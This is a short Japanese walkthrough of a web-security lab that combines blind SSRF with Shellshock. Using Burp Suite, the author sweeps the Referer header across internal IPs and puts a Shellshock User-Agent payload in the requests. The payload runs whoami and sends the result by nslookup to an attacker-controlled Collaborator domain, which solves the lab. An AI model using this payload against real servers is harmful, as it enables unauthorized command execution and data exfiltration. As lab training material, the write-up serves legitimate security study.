Hello there, ('ω')ノ
Shellshockエクスプロイトを使用したブラインドSSRFを。
まずは、BApp StoreからCollaborator Everywhereという拡張機能をインストールして。
これは、Burp Collaboratorにピングバックを発生させて。
バックエンドシステムを明らかにするようで。
また、スコープ内のプロキシトラフィックを増強するようで。

インストールが確認できて。

ページでアクセスして。

Collaborator Everywhereがターゲットになるようにスコープの設定を。

商品を選択すると。

さっそく、Collaborator Everywhere関連の脆弱性が。


商品を選択したリクエストをIntruderへ。

さらにCollaborator clientも起動して。

HTTPインタラクションには、リクエスト内にUser-Agent文字列が含まれていて。
これがShellshock攻撃のペイロードとして使用される可能性があって。
なので、下記のように変更して。
最後にクリップボードにコピーしたCollaboratorドメインのShellshockペイロードを。
User-Agent:() { :; }; /usr/bin/nslookup $(whoami).o4twq1egfkpgdcoa1z6cxy3y7pdh16.burpcollaborator.net
リファラヘッダを変更して。
第4オクテットをピボットすることに 。
Referer: http://192.168.0.§1§:8080

可変させるIPアドレスの範囲をして。

Start attackして。

Poll nowをクリックすると。
Collaboratorでキャプチャされたすべてのインタラクションが表示されて。
これで、Blind SSRF攻撃に成功したバックエンドシステムによって。
開始されたDNS相互作用が表示されて。
OSユーザの名前は、DNSサブドメイン内に表示されて。

下記のOSユーザ名前を入力すると。
peter-xMdXOi

クリアできた。

Best regards, (^^ゞ